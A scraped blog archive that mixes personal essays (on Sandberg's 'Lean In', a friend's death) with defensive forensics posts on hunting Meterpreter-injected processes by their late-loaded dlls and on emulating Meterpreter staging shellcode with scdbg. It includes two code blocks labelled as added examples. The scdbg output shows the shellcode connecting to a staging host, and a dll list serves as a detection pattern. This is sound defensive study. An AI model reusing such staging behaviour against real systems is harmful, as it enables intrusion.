youtube-src-id="cwLRQn61oUY"></iframe></div></span></div></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-9311402665388071032024-02-23T16:16:00.000-08:002024-03-03T16:53:26.508-08:00The Problem is the People, but Which People?<div>In my second job out of college, my boss' boss would often say, "Wherever you go there's always a problem and the problem is always the people." 
I wondered to myself, "Yeah, but which people?"</div><div><br /></div><div>In my <a href="https://trustedsignal.blogspot.com/2024/02/lean-in-for-yourself.html" target="_blank">previous post in this series</a>, I recounted how reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>, reminded me of my grandfather refusing to let my grandmother pursue her master's degree because he didn't want her to have more formal education than he did; a sad example of a woman wanting to lean in to her career and a man not just failing to support her through passivity, but actively preventing her from achieving more.</div><div><br /></div><div>I mentioned in that post that my motivation for reading <u>Lean In</u> was to become a better leader. Sandberg is an amazingly successful business leader. She was integral to building both Google and Facebook. Another motivator was that I want to be able to speak to my daughters about Sandberg's book from having read it, not from having read about it. </div><div><br /></div><div><u>Lean In</u> came out in 2013 and was a number one international bestseller, but it wasn't without criticism. I'm not going to provide a critique or a review as I'm not qualified to do so. I will share some of the things I thought were interesting and valuable to me. I encourage you to read it for yourself and to read the criticism also.</div><div><br /></div><div>Sandberg tells us she wrote the book</div><div></div><blockquote><div>"to encourage women to dream big, forge a path through the obstacles, and <b>achieve their full potential</b>. I am hoping that each woman will set her own goals and reach for them with gusto. And I am hoping that <b>each man will do his part to support women in the workplace and in the home</b> with gusto. 
As we start using the talents of the entire population, our institutions will be more productive, our homes will be happier, and the children growing up in those homes will no longer be held back by narrow stereotypes." (Sandberg, 2013, p. 171)</div><div></div></blockquote><div>I <i>mostly</i> agree with Sandberg. There is some daylight between us around the <i>heteronormativity</i> of the statement, but in general, I agree that we should encourage and support women to reach their full potential. I want the same for anyone regardless of their gender or where they fall on the <a href="https://www.scientificamerican.com/article/sex-redefined-the-idea-of-2-sexes-is-overly-simplistic1/" target="_blank">spectrum of biological sex</a>. I think any good-natured, rational person should want any other person to achieve their full potential.</div><div><br /></div><div>Sandberg's reasons for writing <u>Lean In</u> beg the question, are women failing to reach their full potential? The book and a few minutes searching online make it clear that women are underrepresented in traditional positions of power, and are paid less than men for the same work. </div><div><br /></div><div>Women make up 50 percent of the population, yet they currently hold 10 percent of Fortune 500 CEO positions and that's a record high (<a href="https://fortune.com/2023/06/05/fortune-500-companies-2023-women-10-percent/" target="_blank">Fortune, Hinchliffe</a>). Kunal Modi, cited in my previous post, points out <span style="font-family: inherit;">that women make up only 17 percent of the U.S. Congress and 16 percent of C-suites. <span>(</span><a href="https://www.huffpost.com/entry/man-up-on-family-and-work_b_1667878" target="_blank">Huffington Post, Modi</a><span>)</span></span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">"Women earn 57 percent of undergraduate degrees <span>and account for nearly 60 percent of all graduate school enrollment. 
However, in the disciplines that continue to define America's economic future -- engineering, computer science, mathematics, and physical sciences -- women earn less than half of all degrees." (<a href="https://www.huffpost.com/entry/man-up-on-family-and-work_b_1667878" target="_blank">Huffington Post, Modi</a>)</span></span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">There's debate about the cause of these disparities. Recall the 10-page document authored by James </span>Damore, "Google's Ideological Echo Chamber," where Damore presented evidence that biological differences between men and women may explain these disparities. As with so much of social science, here, the science is unsettled. (<a href="https://www.wired.com/story/the-pernicious-science-of-james-damores-google-memo/" target="_blank">Wired, Molteni</a>)</div><div><br /></div><div>Damore's memo cites studies that show "men systematize, women empathize" and that this may be the reason for women's underrepresentation in technical or leadership roles rather than active discrimination. Yet even in high-empathy roles like human resources where "<span style="color: #1e293b;"><span style="font-family: inherit;">76% of HR Managers are women, male HR Managers earn 40% more than their female counterparts." (<a href="https://www.visier.com/blog/gender-divide-part-1/" target="_blank">Visier, Barron</a>) Read that again. If it's not active discrimination, there are egregious sins of omission resulting in this pay gap. </span></span></div><div><br /></div><div>Given these facts, it's hard to believe anyone would argue in good faith that women are realizing their full potential. </div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><br /></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;">If we accept that there's a problem, what is the cause? 
My old boss' boss would say it's the people. Sure, but which people? Why are women underrepresented in leadership and how do we fix it? Sandberg has much to say on this and I'll dive into it in my <a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem.html" target="_blank">next post</a>. </span></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;"><br /></span></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;">Until then, I'm taking inspiration from Beyoncé's going hard and slaying all day, maybe you will too.</span></span></span></div><div><span style="color: #1e293b;"><span style="font-family: inherit;"><span style="color: black;"><br /></span></span></span></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/WDZJPJV__bQ" width="320" youtube-src-id="WDZJPJV__bQ"></iframe></div><br /><div><br /></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-56200563265345033122024-02-17T17:36:00.000-08:002024-02-23T16:20:41.472-08:00Lean In for Yourself<div style="text-align: left;">Small family farming is a labor intensive way to go broke. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">When I was young I spent some weeks each summer with my grandparents. As farmers and cattle ranchers, my grandparents scratched out an existence. My grandpa was up before dawn feeding cattle and out working fields of corn, milo, sorghum, soybeans, and wheat until after sunset. There were too few boom years, and too many bust years. They had neighbors who lost everything. 
My grandparents survived.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">One thing that helped keep them afloat was my grandmother's rural elementary school teacher salary. When we ran errands together we frequently encountered her former students and it was clear from the things they said that they loved and respected her.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">At one point she decided to get her master's degree. My granddad stopped her. He didn't like the idea that she would have more formal education than he did.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">I've been thinking about this bit of my family history lately, prompted by reading <a href="https://www.linkedin.com/in/sheryl-sandberg-5126652/" target="_blank">Sheryl Sandberg's</a> book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">My granddad may have perceived that his pride was spared by preventing my grandmother from pursuing her master's, but I've been thinking about the emotional, financial, and communal costs. Was my grandmother wounded by this? How could she not be? 
She would have made more money over her career and may have been a better educator, which would have benefited an entire community.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">If he had been supportive, allowed her to lean in to her career and leaned in more at home himself, how would things have been different?</div><div style="text-align: left;"><br /></div><div style="text-align: left;">As I said, my reflections on this were prompted by Sandberg's book, which I read because I'm a people manager and Sandberg is an incredibly accomplished leader and I want to pick up the lessons of great leaders wherever I can. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">I'm also a father to three young women. I want to support them in their careers and Sandberg is arguably one of the most successful business leaders of all time; perhaps I could learn something that would help me help my daughters.</div><p>This personal family anecdote came to me as I was thinking about this quote from Sandberg's book:</p><div></div><blockquote><div>"Kunal Modi, a student at Harvard's Kennedy School, wrote an article imploring men to 'Man Up on Family and Workplace Issues.' He argued that 'for the sake of American corporate performance and shareholder returns, men must play an active role in ensuring that the most talented young workers (often women...) are being encouraged to advocate for their career advancement... So men, let's get involved now -- and not in a patronizing manner that marginalizes this as some altruistic act on behalf of our mothers, wives, and daughters -- but on behalf of ourselves, our companies, and the future of our country." (Sandberg, 2013, pp. 
165-166)</div></blockquote><p>Modi calls men to <b>support "the most talented young workers," not out of altruism, "but on behalf of ourselves."</b> Had my granddad supported my grandmother's pursuit of her master's degree, it would have been to his benefit, to the benefit of his family, and to the benefit of the community.</p><p>We should follow Modi's advice and ensure "that the most talented young workers (often women...) are being encouraged to advocate for their career advancement." We shouldn't do this out of altruism, as Modi suggests; we should do it because it will benefit everyone, including ourselves.</p><p>Note that Modi doesn't say we should do this for women only; he says we should do it for our "most talented young workers," and the implication is that that group may include women, and if it does, we should be encouraging them because they are the most talented. This doesn't appear to be about affirmative action or Diversity, Equity and Inclusion. It's about encouraging the best, period.</p><p>This is the first in a series of posts where I'm reflecting on Sandberg's book in an effort to synthesize my own understanding of the issues and to glean general management insights. In the <a href="https://trustedsignal.blogspot.com/2024/02/the-problem-is-people-but-which-people.html" target="_blank">next post</a>, I'll offer evidence from Sandberg's book and elsewhere supporting her thesis that there is a problem.</p><p>I'll end this post with Taylor Swift's tribute to her grandmother, Marjorie. </p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/hP6QpMeSG6s" width="320" youtube-src-id="hP6QpMeSG6s"></iframe></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-29622079649616697532021-07-13T13:50:00.001-07:002021-07-13T13:50:10.733-07:00RIP Grant W. 
Dotson -- A dear friend<p>It's been a rough day. </p><p>About 18 months ago a friend of mine from high school posted a GoFundMe on Facebook for a mutual friend who was battling cancer. This mutual friend was someone I'd been very close to in elementary and middle school. As happens, we remained friends, but drifted apart a bit in high school, different interests and new friend groups, etc.</p><p>We went off to different colleges and touched base infrequently, but we did touch base. He came to visit me when certain musicians were performing in town and we would go to those shows together. We shared a love for jazz bands and artists like Medeski, Martin and Wood, Bill Frisell, Miles Davis, etc.</p><p>I had no idea he'd been fighting cancer for more than a year. I called him up and got the full story. He was upbeat and optimistic that he would beat it. I planned to go see him, then COVID hit. We stayed in touch, talked every few weeks and texted back and forth almost daily. It was as if no time had passed in the intervening years since childhood.</p><p>A few weeks ago, he texted me that he was in the hospital. The cancer that had ravaged his liver and bowels had spread to his lungs. He was undergoing a tough round of chemo to "nip it from [his] lungs so he could return to bettersville." </p><p>The texts became less frequent. I asked him how he was doing. He said the chemo had made things worse. He was on four liters of oxygen and still couldn't catch his breath. The optimism that he'd expressed for the last 18 months was gone. I cried, told him my heart was breaking for him, that I loved him and that if there was anything I could do for him, please let me know.</p><p>He thanked me for being a good friend. That was a week ago.</p><p>I meant to text him yesterday. Life got in the way. Last night I was lying in bed concerned. I picked up my phone and searched for obituaries in my hometown where he still lived. 
Nothing, thankfully.</p><p>This morning a post in our high school class group on Facebook said that he had passed away yesterday. I cried again. My mind raced with memories of carefree days growing up with him as a constant companion. He was special. Always kind and caring.</p><p>Rest in peace, Grant. I already miss our conversations.</p><p>Hug your loved ones, cherish the moments. Life is short.</p>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-88258105261473368152020-08-04T21:32:00.004-07:002020-08-04T21:38:30.200-07:00Hunting injected processes by the modules they keep<div>A <a href="https://trustedsignal.blogspot.com/2020/07/meterpreters-migrate-detection-and.html" target="_blank">relatively recent post showed how Metasploit's Meterpreter module made some noise on endpoints when the <font face="courier">migrate</font></a> command was used to move the agent code into a legitimate process, <font face="courier">spoolsv.exe</font> in our example.</div><div><br /></div><div>One of the things we saw in that post was that when the agent migrates, it uses commonplace injection techniques that result in three dlls being reflectively loaded into the target process. These dlls are not registered with the process and therefore don't show up in the output of something like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls" target="_blank">listdlls</a>, but we were able to find them using <a href="https://twitter.com/gleeda" target="_blank">gleeda's</a> <a href="https://github.com/gleeda/memtriage" target="_blank">memtriage</a> in combination with <a href="https://www.volatilityfoundation.org/" target="_blank">Volatility's</a> <a href="https://github.com/volatilityfoundation/volatility/wiki/Command-Reference-Mal#malfind" target="_blank">malfind</a> plugin. 
Worth mentioning again, memtriage is really useful because it facilitates some memory analysis without the need for a full memory dump. See the other post for details.</div><div><br /></div><div>We also noted that these three dlls have dependencies on native Windows dlls, and these dozen or so dlls are loaded at the time of agent migration. Depending on how long the target process has been running, these may show up as "late loaded dlls," loaded well after the process started, which could be a powerful detection signal. These late loaded dlls are registered in the process, so we can go hunting for them using something like listdlls, <a href="https://docs.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7" target="_blank">PowerShell's</a> Get-Process cmdlet or a relatively new <a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> module built around the Get-Process cmdlet -- <a href="https://github.com/davehull/Kansa/blob/master/Modules/Process/Get-ProcessesUsingModules.ps1" target="_blank">Get-ProcessesUsingModules.ps1</a>.</div><div><br /></div><div>This new module is one of the few Kansa modules that can take command line arguments, which makes it a bit awkward to use. 
There's an old post <a href="https://trustedsignal.blogspot.com/2014/07/kansa-passing-arguments-to-collector.html" target="_blank">here</a> on what this can look like and we'll dive into the specifics for this new module now.</div><div><br /></div><div><font face="arial" size="2">PS > .\kansa.ps1 -Target $env:computername -ModulePath ".\Modules\Process\Get-ProcessesUsingModules.ps1 wininet.dll,iertutil.dll,winhttp.dll,dhcpcsvc6.dll,dhcpcsvc.dll,webio.dll,psapi.dll,winmm.dll,winmmbase.dll,ole32.dll,mpr.dll,netapi32.dll" -Credential $cred</font></div><div><font face="arial" size="2"><br /></font></div><div><font face="inherit">Above is an example command line for running this new collector with a list of dlls. This list of dlls matches what we saw late loaded into our </font><font face="courier">spoolsv.exe</font><font face="inherit"> process following the migration into that process. Note the double-quotes around the name of the module and its arguments: the module path and its arguments are passed to -ModulePath as a single string. It's also worth noting that depending on the configuration of the meterpreter agent, there may be different dlls loaded. In our example, I was using a reverse http handler. The example still stands, however. If you're analyzing a piece of malware and can determine what dlls it imports, you may be able to put together a list of modules that you can pass to this collector to see if there are processes that have those dlls loaded. 
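The check the collector performs can be reproduced on a single host with Get-Process before pushing a list across a fleet with Kansa. The following is an added PowerShell example, not Kansa's own Get-ProcessesUsingModules.ps1 code: it walks every process, lowercases the names of the modules registered in that process, and reports the processes in which every dll from the list above is present (or, with -Any, at least one of them). The function name Get-ProcessesLoadingModules and the -Any switch are this example's own; the dll list is the one from the command above.

```powershell
# Added example, not Kansa's own Get-ProcessesUsingModules.ps1: reproduce the
# collector's check locally with Get-Process. The function name and the -Any
# switch are this example's own; the dll list is the one passed to Kansa above.
function Get-ProcessesLoadingModules {
    [CmdletBinding()]
    param(
        # Module file names to look for (case-insensitive).
        [Parameter(Mandatory)]
        [string[]]$ModuleName,

        # By default every listed module must be loaded; -Any matches on one or more.
        [switch]$Any
    )

    $wanted = @($ModuleName | ForEach-Object { $_.Trim().ToLowerInvariant() } | Sort-Object -Unique)

    foreach ($proc in Get-Process) {
        # Protected and higher-integrity processes refuse module enumeration;
        # record the skip so a "no hits" result is not mistaken for "all clear".
        try {
            $loaded = @($proc.Modules | ForEach-Object { $_.ModuleName.ToLowerInvariant() })
        } catch {
            Write-Verbose "Skipping $($proc.ProcessName) ($($proc.Id)): $($_.Exception.Message)"
            continue
        }

        $hits = @($wanted | Where-Object { $loaded -contains $_ })
        $match = if ($Any) { $hits.Count -gt 0 } else { $hits.Count -eq $wanted.Count }
        if (-not $match) { continue }

        # StartTime can also throw on processes we cannot query; keep going without it.
        $start = $(try { $proc.StartTime } catch { $null })

        [pscustomobject]@{
            ProcessId   = $proc.Id
            ProcessName = $proc.ProcessName
            StartTime   = $start
            Matched     = ($hits -join ',')
        }
    }
}

# Same module set the post passed to the Kansa collector.
$migrationDlls = 'wininet.dll','iertutil.dll','winhttp.dll','dhcpcsvc6.dll','dhcpcsvc.dll',
                 'webio.dll','psapi.dll','winmm.dll','winmmbase.dll','ole32.dll','mpr.dll','netapi32.dll'

# Run from an elevated prompt so system services such as spoolsv.exe can be inspected.
Get-ProcessesLoadingModules -ModuleName $migrationDlls -Verbose |
    Format-Table ProcessId, ProcessName, StartTime, Matched -AutoSize
```

Two caveats follow from what the post already says. Get-Process only reports modules that are registered with the process, so the three reflectively loaded Meterpreter dlls will not appear here; that is why the post pairs this check with memtriage and malfind. It also reports what is loaded now, not when it was loaded, so turning the "late loaded" idea into a detection needs image-load telemetry with timestamps (for example Sysmon's ImageLoad event, ID 7) that can be compared against the process start time shown in the StartTime column.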
The process may have other dlls loaded too, </font><font face="courier">spoolsv.exe</font><font face="inherit"> certainly does, but this list of dlls was a result of the agent migration and they are not normally loaded into </font><font face="courier">spoolsv.exe</font><font face="inherit">.</font></div><div><font face="inherit"><br /></font></div><div><font face="inherit">Our console output from running this looks like the below, assuming verbose mode:</font></div><div><font face="inherit"><br /></font></div><div><font face="arial" size="2">VERBOSE: Running module:</font></div><div><font face="arial" size="2">Get-ProcessesUsingModules</font></div><div><font face="arial" size="2">wininet.dll,iertutil.dll,winhttp.dll,dhcpcsvc6.dll,dhcpcsvc.dll,webio.dll,psapi.dll,winmm.dll,winmmbase.dll,ole32.dll,m</font></div><div><font face="arial" size="2">pr.dll,netapi32.dll</font></div><div><font face="arial" size="2">VERBOSE: Found logging.conf</font></div><div><font face="arial" size="2">VERBOSE: Running module on machines 0 to 1 of 1 (0.0 %)</font></div><div><font face="arial" size="2">VERBOSE: Waiting for Get-ProcessesUsingModules wininet.dll iertutil.dll winhttp.dll dhcpcsvc6.dll dhcpcsvc.dll</font></div><div><font face="arial" size="2">webio.dll psapi.dll winmm.dll winmmbase.dll ole32.dll mpr.dll netapi32.dll to complete.</font></div><div><font face="arial" size="2"><br /></font></div><div><font face="arial" size="2">Id Name PSJobTypeName State HasMoreData Location Command</font></div><div><font face="arial" size="2">-- ---- ------------- ----- ----------- -------- -------</font></div><div><font face="arial" size="2">7 Job7 RemoteJob Completed True WINS2012R202 <# ...</font></div><div><font face="arial" size="2">WARNING: ProcessesUsingModules's output path contains arguments that were passed to it. 
Those arguments were truncated f</font></div><div><font face="arial" size="2">rom wininet.dlliertutil.dllwinhttp.dlldhcpcsvc6.dlldhcpcsvc.dllwebio.dllpsapi.dllwinmm.dllwinmmbase.dllole32.dllmpr.dlln</font></div><div><font face="arial" size="2">etapi32.dll to wininet.dlliertutil.dllwinhttp.dlldhcpcsvc6.dlldhcpcsvc.dllwebio.dllpsap to accommodate Window's MAXPATH</font></div><div><font face="arial" size="2">limitations of 260 characters.</font></div><div><font face="arial" size="2">VERBOSE: ### All Done ###</font></div><div><br /></div><div>Note the MAXPATH issue. The way Kansa works, the directory names for the collector output include the command line arguments, and in this case those arguments exceed the default path length limit on my Windows system, so Kansa makes some adjustments and truncates them.</div><div><br /></div><div>What does the collector output look like? Below is a snapshot of the output folder for this collector; note the long folder name.</div><div><br /></div><div><img alt="" src="data:image/png;base64,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" /></div><div><br /></div><div>Inside that folder there's a file for each targeted system; in our case there's only one. 
We ran with the default output type, so we have a CSV file and its contents are as follows:</div><div><br /></div><div><div><font face="courier">"ProcessId","ProcessName","PSComputerName"</font></div><div><font face="courier">"1084","spoolsv","WINS2012R202"</font></div></div><div><br /></div><div>This means that on our targeted endpoint we had a single process with this set of dlls loaded, our injected <font face="courier">spoolsv.exe</font> process.</div><div><br /></div><div>Happy hunting!</div><div><br /></div><div>Posted by davehull</div><h2 style="text-align: left;">Analyzing an Instance of Meterpreter's Shellcode</h2><div>Published 2020-07-25</div>In my previous post on <a href="https://trustedsignal.blogspot.com/2020/07/meterpreters-migrate-detection-and.html" target="_blank">detecting and investigating Meterpreter's Migrate</a> functionality, I went down a rabbit hole on the initial PowerShell attack spawned by an Excel macro. In that payload was a bit of shellcode, and I mentioned that I'd like to return to it at some point for further analysis. I do not consider myself a reverse engineer, though I have dabbled over the years.<div><br /></div><div>What follows then is an amateur's ambling. 
If you are reading this and have insights you'd like to share, I'd love to receive them via the comments here, an <a href="https://twitter.com/davehull" target="_blank">@ mention or DM on Twitter</a>.</div><div><br /></div><div>Our shellcode from the previous post looked like this:</div><div><br /></div><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 14px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">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</span></p></div><div><br /></div><div>Unsure how to proceed with analyzing this, I did a little searching online for things like "analyzing shellcode," "shellcode analysis," "shellcode reversing," etc. There are hundreds of thousands of hits, so no shortage of sites to go chase down.</div><div><br /></div><div>Here's where I landed. I had a <a href="https://github.com/fireeye/flare-vm" target="_blank">Flare VM</a> from a CTF I'd worked on some time back and I saw that it had recently been updated for the release of <a href="https://www.fireeye.com/blog/threat-research/2020/07/capa-automatically-identify-malware-capabilities.html" target="_blank">capa from Fireeye's Flare team</a>. I knew various posts about shellcode analysis referenced tools that are in the Flare VM, like scdbg, so I decided I'd spin up my old Flare VM and give it a go.</div><div><br /></div><div>Suffice to say, updating my Flare VM to the latest wasn't straightforward. 
There were some breaking changes in the upgrade, so I scrapped it and started over with a fresh Win10 system.</div><div><br /></div><div>Based on what I'd read elsewhere, my first inclination was to try <a href="http://sandsprite.com/blogs/index.php?uid=7&pid=152" target="_blank">scdbg.exe</a>, which is packaged as part of Flare VM.</div><div><br /></div><div><div><font face="courier"></font></div><span style="font-family: courier;">PS> scdbg.exe -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 2000000</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><font face="courier"><br /></font><div style="text-align: left;"><font face="courier">Stepcount 2000001</font></div><div style="text-align: left;"><font face="courier"><br /></font></div><div><font face="courier"></font></div></div><div>This was immediately insightful. I now knew that the string of bytes imported functions from the wininet.dll referenced in the previous post. 
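As an added example that is not part of the post and not scdbg's code, the following Python parses the <font face="courier">address API(args)</font> lines scdbg prints into records and pulls out the indicators worth lining up against Sysmon: libraries loaded, server and port, request path, and allocations. The sample text is constructed from the runs shown in this post, and the line format is inferred from those runs, so the regular expression is an assumption rather than a documented scdbg output format.

```python
# Added example, not part of the post and not scdbg's code: parse the API
# call lines scdbg prints (address, API name, argument list, optional return
# value) and summarise the indicators worth comparing with Sysmon. The line
# shape is inferred from the runs in this post; treat the regex as an
# assumption, not a documented scdbg format.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: the calls scdbg reported for this shellcode across the
# runs in the post, with the usual banner and trailer lines around them.
SCDBG_OUTPUT = """\
Loaded 296 bytes from file shellcode.bin
Detected straight hex encoding input format converting...
Initialization Complete..
Max Steps: 54465000
Using base offset: 0x401000

40109a LoadLibraryA(wininet)
4010a8 InternetOpenA()
4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )
4010d9 HttpOpenRequestA(path: /8Kh89, )
4010e9 HttpSendRequestA()
401117 VirtualAlloc(base=0 , sz=400000) = 600000
40112b InternetReadFile(4893, buf: 600000, size: 2000)

Stepcount 54465001
"""

API_LINE = re.compile(
    r"^(?P<addr>[0-9a-f]{6,8})\s+(?P<api>\w+)\((?P<args>.*)\)"
    r"(?:\s*=\s*(?P<ret>[0-9a-fA-Fx]+))?\s*$")


@dataclass
class ApiCall:
    addr: int
    api: str
    args: Dict[str, str]   # named args ("server", "port", ...); positional ones keyed "_0", "_1", ...
    ret: Optional[str]


def parse_args(raw: str) -> Dict[str, str]:
    """Split 'server: 10.47.47.26, port: 80, ' or 'base=0 , sz=400000' into a dict."""
    args = {}
    for i, part in enumerate(p.strip() for p in raw.split(",")):
        if not part:            # a trailing comma leaves an empty field
            continue
        m = re.match(r"^(\w+)\s*[:=]\s*(.*)$", part)
        if m:
            args[m.group(1)] = m.group(2).strip()
        else:
            args["_%d" % i] = part
    return args


def parse_scdbg(text: str) -> List[ApiCall]:
    """Keep only the emulated API call lines; banner, step count and disassembly lines have no parentheses."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if m:
            calls.append(ApiCall(int(m["addr"], 16), m["api"], parse_args(m["args"]), m["ret"]))
    return calls


def summarize(calls: List[ApiCall]) -> dict:
    """Indicators to check against endpoint telemetry: libraries loaded,
    network destinations, request paths and sizable allocations (the
    VirtualAlloc/InternetReadFile pair here is a staging buffer being filled)."""
    out = {"sequence": [c.api for c in calls], "libraries": [], "connections": [],
           "paths": [], "allocations": []}
    for c in calls:
        if c.api == "LoadLibraryA":
            out["libraries"].append(c.args.get("_0"))
        elif c.api == "InternetConnectA":
            out["connections"].append((c.args.get("server"), int(c.args.get("port", "0"))))
        elif c.api == "HttpOpen RequestA".replace(" ", ""):
            out["paths"].append(c.args.get("path"))
        elif c.api == "VirtualAlloc":
            out["allocations"].append((int(c.args.get("sz", "0"), 16), c.ret))
    return out


if __name__ == "__main__":
    for key, value in summarize(parse_scdbg(SCDBG_OUTPUT)).items():
        print(key, value)
```

The summary is the piece to keep next to the Sysmon events: the connection tuple should match the network event from the previous post, while the path is something the endpoint logs never showed.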
I could also see the IP address and port it was reaching out to, which were also seen in the Sysmon logs in the previous post.</div><div><br /></div><div>Having read this post from Didier Stevens, <a href="https://isc.sans.edu/forums/diary/Another+quickie+Using+scdbg+to+analyze+shellcode/24058/" target="_blank">Another Quickie: Using scdbg to analyze shellcode</a>, I recognized that there may be more to this shellcode than what was shown above, as scdbg only emulates 2 million instructions by default. So, I increased the step count as shown below:</div><div><br /></div><div><div></div><span style="font-family: courier;">PS> scdbg.exe </span><font color="#ff0000" style="font-family: courier;">-s 3000000</font><span style="font-family: courier;"> -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 3000000</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><span style="font-family: courier;">4010e9 HttpSendRequestA()</span><br /><span style="font-family: courier;">401117 VirtualAlloc(base=0 , sz=400000) = 600000</span><br /><font face="courier"><br /></font><div style="text-align: left;"><font face="courier">Stepcount 3000001</font></div><div style="text-align: left;"><font face="courier"><br /></font></div><div></div></div><div>How many steps are enough? 
I would guess it depends on the shellcode. In my experimentation with this sample, I didn't appear to glean additional information by increasing the step count beyond this. YMMV.</div><div><br /></div><div>Other options can be passed to <font face="courier">scdbg </font>and you should run it without passing it any arguments to see what the possibilities are. One can increase verbosity by passing <font face="courier">-v</font> and increase it more with <font face="courier">-vv</font> through <font face="courier">-vvvv</font>. A single <font face="courier">-v</font> will display disassembly:</div><div><br /></div><div><div><font face="courier" size="2"></font></div><font size="2"><span style="font-family: courier;">PS> scdbg.exe -v -s 20 -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 20</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><span style="font-family: courier;">Verbosity: 1</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401000 E882000000 call 0x401087 step: 0</span><br /><span style="font-family: courier;">401087 5D pop ebp</span><br /><span style="font-family: courier;">401088 686E657400 push dword 0x74656e</span><br /><span style="font-family: courier;">40108d 6877696E69 push dword 0x696e6977</span><br /><span style="font-family: courier;">401092 54 push esp</span><br /><span style="font-family: courier;">401093 684C772607 push dword 0x726774c step: 5</span><br /><span style="font-family: courier;">401098 FFD5 call ebp</span><br /><span style="font-family: courier;">401005 60 pusha</span><br /><span style="font-family: courier;">401006 89E5 mov ebp,esp</span><br /><span style="font-family: 
courier;">401008 31C0 xor eax,eax</span><br /><span style="font-family: courier;">40100a 648B5030 mov edx,fs:[eax+0x30] step: 10</span><br /><span style="font-family: courier;">40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier;">401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier;">401014 8B7228 mov esi,[edx+0x28]</span><br /><span style="font-family: courier;">401017 0FB74A26 movzx ecx,[edx+0x26]</span><br /><span style="font-family: courier;">40101b 31FF xor edi,edi step: 15</span><br /><span style="font-family: courier;">40101d AC lodsb</span><br /><span style="font-family: courier;">40101e 3C61 cmp al,0x61</span><br /><span style="font-family: courier;">401020 7C02 jl 0x401024 vv</span><br /><span style="font-family: courier;">401022 2C20 sub al,0x20</span><br /><span style="font-family: courier;">401024 C1CF0D ror edi,0xd step: 20</span><br /><font face="courier"><br /></font></font><div style="text-align: left;"><font face="courier" size="2">Stepcount 21</font></div><div><font face="courier"></font></div></div><div><br /></div><div>Increasing the verbosity with <font face="courier">-vv</font> gives register values:</div><div><div></div><font size="1"><span style="font-family: courier;">PS> scdbg.exe -vv -s 8 -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 